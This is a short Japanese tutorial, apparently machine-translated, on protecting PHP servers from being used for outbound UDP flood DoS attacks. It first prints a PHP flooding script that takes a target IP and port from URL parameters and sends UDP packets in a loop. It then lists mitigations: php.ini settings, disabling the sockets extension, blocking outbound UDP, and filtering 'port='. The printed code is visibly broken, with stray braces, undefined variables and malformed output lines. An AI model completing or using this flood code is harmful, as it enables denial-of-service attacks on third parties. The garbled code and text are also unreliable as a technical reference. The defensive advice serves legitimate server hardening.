ユーザーが PHP コード DOS を使用してネットワーク帯域幅を使い果たさないようにするための php コード

PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃します。 一般的なコードは次のとおりです。

コードをコピーします。 コードは次のとおりです。

$ip = $ _GET['ip'] ;

$rand = $_GET['port'];
ignore_user_abort(FALSE); ;
print "フラッディング: $ip ポート $rand";
$max_time = $time+$exec_time){
$out .= "X";
}
while(1 ){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
}
}
echo ".time('h:i:s) ')." with $ packets (" .round(($packets*65)/1024, 2) . " mB) パケット平均 ".round($packets/$exec_time, 2) " packets/s \n";
?>


特徴:
IIS がオンになるとすぐに、サーバーの送信帯域幅が使い果たされます。つまり、サーバーは他のサーバーにパケットを送信し続けます。この状況は、攻撃を受ける場合とは異なります。 DDOS は大量のデータ パケットを受信し続けます。
解決方法:
c:windowsphp.ini に設定します:
disable_functions =gzinflate;
c:windowsphp.ini の値を Off に設定します。 allow_url_fopen = Off
そして:
;extension=php_sockets.dll

先頭の「;」記号が存在する必要があります。これは、socket.dll の使用を制限することを意味します
その前の「;」記号は保持する必要があります
その後IIS を再起動します
上記の方法がまだ機能しない場合は、IIS での PHP 拡張機能のテストと許可された拡張機能を無効にすることができます。
さらに、暗号化されていない PHP 攻撃コードについては、次の方法を使用して対処することもできます。 IP ポリシーまたはファイアウォールで、すべての UDP の送信を禁止します。
2. 第一級の情報監視、SQL インターセプト、および URL インターセプトを使用します。キーワード port= をインターセプトします。
上記は、PHP コードを使用する DOS によるネットワーク帯域幅の使い果たしを防ぐための PHP コードを、PHP コードの内容も含めて紹介しました。PHP チュートリアルに興味のある友人に役立つことを願っています。